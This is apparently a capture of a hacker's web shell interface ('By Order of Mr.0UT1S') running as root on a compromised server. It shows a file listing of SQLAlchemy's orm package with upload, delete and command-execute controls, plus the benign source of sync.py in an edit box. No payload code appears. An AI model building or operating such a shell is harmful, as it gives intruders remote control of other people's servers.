opt
/
hc_python
/
lib
/
python3.12
/
site-packages
/
sqlalchemy
/
orm
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
[DIR] __pycache__
N/A
__init__.py
8.26 KB
Rename
Delete
_orm_constructors.py
101.20 KB
Rename
Delete
_typing.py
4.86 KB
Rename
Delete
attributes.py
90.37 KB
Rename
Delete
base.py
26.86 KB
Rename
Delete
bulk_persistence.py
70.96 KB
Rename
Delete
clsregistry.py
17.55 KB
Rename
Delete
collections.py
51.03 KB
Rename
Delete
context.py
112.42 KB
Rename
Delete
decl_api.py
63.45 KB
Rename
Delete
decl_base.py
81.34 KB
Rename
Delete
dependency.py
46.51 KB
Rename
Delete
descriptor_props.py
36.36 KB
Rename
Delete
dynamic.py
9.59 KB
Rename
Delete
evaluator.py
12.06 KB
Rename
Delete
events.py
124.79 KB
Rename
Delete
exc.py
7.24 KB
Rename
Delete
identity.py
9.03 KB
Rename
Delete
instrumentation.py
23.75 KB
Rename
Delete
interfaces.py
47.65 KB
Rename
Delete
loading.py
56.91 KB
Rename
Delete
mapped_collection.py
19.22 KB
Rename
Delete
mapper.py
167.63 KB
Rename
Delete
path_registry.py
25.31 KB
Rename
Delete
persistence.py
60.25 KB
Rename
Delete
properties.py
28.38 KB
Rename
Delete
query.py
115.95 KB
Rename
Delete
relationships.py
125.88 KB
Rename
Delete
scoping.py
76.77 KB
Rename
Delete
session.py
191.52 KB
Rename
Delete
state.py
36.79 KB
Rename
Delete
state_changes.py
6.66 KB
Rename
Delete
strategies.py
117.06 KB
Rename
Delete
strategy_options.py
83.05 KB
Rename
Delete
sync.py
5.64 KB
Rename
Delete
unitofwork.py
26.40 KB
Rename
Delete
util.py
78.94 KB
Rename
Delete
writeonly.py
21.78 KB
Rename
Delete
# orm/sync.py # Copyright (C) 2005-2025 the SQLAlchemy authors and contributors # <see AUTHORS file> # # This module is part of SQLAlchemy and is released under # the MIT License: https://www.opensource.org/licenses/mit-license.php # mypy: allow-untyped-defs, allow-untyped-calls """private module containing functions used for copying data between instances based on join conditions. """ from __future__ import annotations from . import exc from . import util as orm_util from .base import PassiveFlag def populate( source, source_mapper, dest, dest_mapper, synchronize_pairs, uowcommit, flag_cascaded_pks, ): source_dict = source.dict dest_dict = dest.dict for l, r in synchronize_pairs: try: # inline of source_mapper._get_state_attr_by_column prop = source_mapper._columntoproperty[l] value = source.manager[prop.key].impl.get( source, source_dict, PassiveFlag.PASSIVE_OFF ) except exc.UnmappedColumnError as err: _raise_col_to_prop(False, source_mapper, l, dest_mapper, r, err) try: # inline of dest_mapper._set_state_attr_by_column prop = dest_mapper._columntoproperty[r] dest.manager[prop.key].impl.set(dest, dest_dict, value, None) except exc.UnmappedColumnError as err: _raise_col_to_prop(True, source_mapper, l, dest_mapper, r, err) # technically the "r.primary_key" check isn't # needed here, but we check for this condition to limit # how often this logic is invoked for memory/performance # reasons, since we only need this info for a primary key # destination. if ( flag_cascaded_pks and l.primary_key and r.primary_key and r.references(l) ): uowcommit.attributes[("pk_cascaded", dest, r)] = True def bulk_populate_inherit_keys(source_dict, source_mapper, synchronize_pairs): # a simplified version of populate() used by bulk insert mode for l, r in synchronize_pairs: try: prop = source_mapper._columntoproperty[l] value = source_dict[prop.key] except exc.UnmappedColumnError as err: _raise_col_to_prop(False, source_mapper, l, source_mapper, r, err) try: prop = source_mapper._columntoproperty[r] source_dict[prop.key] = value except exc.UnmappedColumnError as err: _raise_col_to_prop(True, source_mapper, l, source_mapper, r, err) def clear(dest, dest_mapper, synchronize_pairs): for l, r in synchronize_pairs: if ( r.primary_key and dest_mapper._get_state_attr_by_column(dest, dest.dict, r) not in orm_util._none_set ): raise AssertionError( f"Dependency rule on column '{l}' " "tried to blank-out primary key " f"column '{r}' on instance '{orm_util.state_str(dest)}'" ) try: dest_mapper._set_state_attr_by_column(dest, dest.dict, r, None) except exc.UnmappedColumnError as err: _raise_col_to_prop(True, None, l, dest_mapper, r, err) def update(source, source_mapper, dest, old_prefix, synchronize_pairs): for l, r in synchronize_pairs: try: oldvalue = source_mapper._get_committed_attr_by_column( source.obj(), l ) value = source_mapper._get_state_attr_by_column( source, source.dict, l, passive=PassiveFlag.PASSIVE_OFF ) except exc.UnmappedColumnError as err: _raise_col_to_prop(False, source_mapper, l, None, r, err) dest[r.key] = value dest[old_prefix + r.key] = oldvalue def populate_dict(source, source_mapper, dict_, synchronize_pairs): for l, r in synchronize_pairs: try: value = source_mapper._get_state_attr_by_column( source, source.dict, l, passive=PassiveFlag.PASSIVE_OFF ) except exc.UnmappedColumnError as err: _raise_col_to_prop(False, source_mapper, l, None, r, err) dict_[r.key] = value def source_modified(uowcommit, source, source_mapper, synchronize_pairs): """return true if the source object has changes from an old to a new value on the given synchronize pairs """ for l, r in synchronize_pairs: try: prop = source_mapper._columntoproperty[l] except exc.UnmappedColumnError as err: _raise_col_to_prop(False, source_mapper, l, None, r, err) history = uowcommit.get_attribute_history( source, prop.key, PassiveFlag.PASSIVE_NO_INITIALIZE ) if bool(history.deleted): return True else: return False def _raise_col_to_prop( isdest, source_mapper, source_column, dest_mapper, dest_column, err ): if isdest: raise exc.UnmappedColumnError( "Can't execute sync rule for " "destination column '%s'; mapper '%s' does not map " "this column. Try using an explicit `foreign_keys` " "collection which does not include this column (or use " "a viewonly=True relation)." % (dest_column, dest_mapper) ) from err else: raise exc.UnmappedColumnError( "Can't execute sync rule for " "source column '%s'; mapper '%s' does not map this " "column. Try using an explicit `foreign_keys` " "collection which does not include destination column " "'%s' (or use a viewonly=True relation)." % (source_column, source_mapper, dest_column) ) from err
Save